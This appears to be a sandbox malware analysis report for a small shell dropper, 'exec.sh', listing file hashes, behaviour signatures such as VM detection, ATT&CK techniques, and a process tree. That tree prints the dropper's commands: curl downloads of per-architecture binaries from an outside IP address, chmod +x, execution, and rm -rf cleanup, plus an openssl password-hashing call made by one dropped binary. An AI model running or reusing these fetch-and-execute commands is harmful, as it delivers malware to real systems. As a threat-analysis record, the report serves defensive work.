Overview

overview

8

Static

static

1

exec.sh

ubuntu-18.04-amd64

8

exec.sh

debian-9-armhf

7

exec.sh

debian-9-mips

7

exec.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    148s
  • max time network
    147s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240226-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    13-03-2024 23:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    exec.sh

  • Size

    842B

  • MD5

    4eeac4436b9c68f85b1c3a2bae62d3f3

  • SHA1

    4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1

  • SHA256

    bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520

  • SHA512

    e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b

Score
7/10
antivm

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 8 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/exec.sh
    /tmp/exec.sh
    1⤵
      PID:642
      • /usr/bin/curl
        curl -o 386_binary http://5.10.249.153:9999/386
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:646
      • /bin/chmod
        chmod +x 386_binary
        2⤵
          PID:757
        • /tmp/386_binary
          ./386_binary
          2⤵
          • Executes dropped EXE
          PID:758
        • /bin/rm
          rm -rf 386_binary
          2⤵
            PID:760
          • /usr/bin/curl
            curl -o amd64_binary http://5.10.249.153:9999/amd64
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:761
          • /bin/chmod
            chmod +x amd64_binary
            2⤵
              PID:768
            • /tmp/amd64_binary
              ./amd64_binary
              2⤵
              • Executes dropped EXE
              PID:769
            • /bin/rm
              rm -rf amd64_binary
              2⤵
                PID:771
              • /usr/bin/curl
                curl -o arm_binary http://5.10.249.153:9999/arm
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:772
              • /bin/chmod
                chmod +x arm_binary
                2⤵
                  PID:779
                • /tmp/arm_binary
                  ./arm_binary
                  2⤵
                  • Executes dropped EXE
                  • Enumerates kernel/hardware configuration
                  PID:780
                  • /usr/bin/openssl
                    openssl passwd -6 scmg40I9gecr
                    3⤵
                      PID:784
                  • /bin/rm
                    rm -rf arm_binary
                    2⤵
                      PID:785
                    • /usr/bin/curl
                      curl -o arm64_binary http://5.10.249.153:9999/arm64
                      2⤵
                      • Checks CPU configuration
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:786

                  Network

                  MITRE ATT&CK Matrix ATT&CK v13

                  Initial Access

                  Execution

                  Persistence

                  Privilege Escalation

                  Defense Evasion

                  Virtualization/Sandbox Evasion

                  1
                  T1497

                  Credential Access

                  Discovery

                  Virtualization/Sandbox Evasion

                  1
                  T1497

                  System Information Discovery

                  1
                  T1082

                  Lateral Movement

                  Collection

                  Exfiltration

                  Command and Control

                  Impact

                  Resource Development

                  Reconnaissance

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/386_binary
                    Filesize

                    420KB

                    MD5

                    c844c5c14bd7b2ca8d8a585f0bb4b0c8

                    SHA1

                    d5f7155b192c31f9d8842a36a92047ef171ea10f

                    SHA256

                    a5f83fdef2bae782dd96949e9d1caa38440621f9b4a61008be1acda95ee87e92

                    SHA512

                    8b74d415627379c8e9f862821f462406654bd40b1391a65a3c43056bf62026e3d3218d8567e14f678e172e95c0853b9bc9667c5a2c280fa891cb292d8aab8663

                    Download Submit
                  • /tmp/amd64_binary
                    Filesize

                    64KB

                    MD5

                    733642767a2782e29b1300f0cc3bb5af

                    SHA1

                    a0f8d340e855f752f4597c833b3a0ea9d617238d

                    SHA256

                    c7f031e99869413fe8e58fdf04768fc42edbadd773639eb13bddafe2161643dc

                    SHA512

                    17b29aca11bf10268aa43689cd199b3adbdadcf052c2bb4365255979524ad3822546d243068f3d3a0812ac4fe1e1db4f2bee7a4183c8c626ae9c82a64572a9e4

                    Download Submit
                  • /tmp/arm64_binary
                    Filesize

                    19KB

                    MD5

                    f8b0a6c9ed9d33191661fce600b819ac

                    SHA1

                    cd3e411eb4e115c249a25bde87f7e3d876bf245d

                    SHA256

                    1364c16c4464d2840c2316bb0c9508dcfff922e121192596342189b2826d6557

                    SHA512

                    7f441f9195a2ac1f01f92c081624c4eaedc0ef30d093d1990e9cb52a5da27a90a5b1abd64df75b57774fadb1b23cb35c2f41aca2325f702e687213fcdef47770

                    Download Submit
                  • /tmp/arm_binary
                    Filesize

                    168KB

                    MD5

                    6818fc04117b0863b9489962c744bce6

                    SHA1

                    ba296427584041f5fcbdb56c8280387ffe42137e

                    SHA256

                    e469a8fe15ef6d6f28380f3a268423dd501d1d653b164d88412362e2f2c76b43

                    SHA512

                    7a57546909cb6c4672f28575243c87aa023828cee4660e64b98b22394ebb8858ca7d812c3bd622ba57dff708bb0c09fb2df2e8768e541b4939176744fa4f062f

                    Download Submit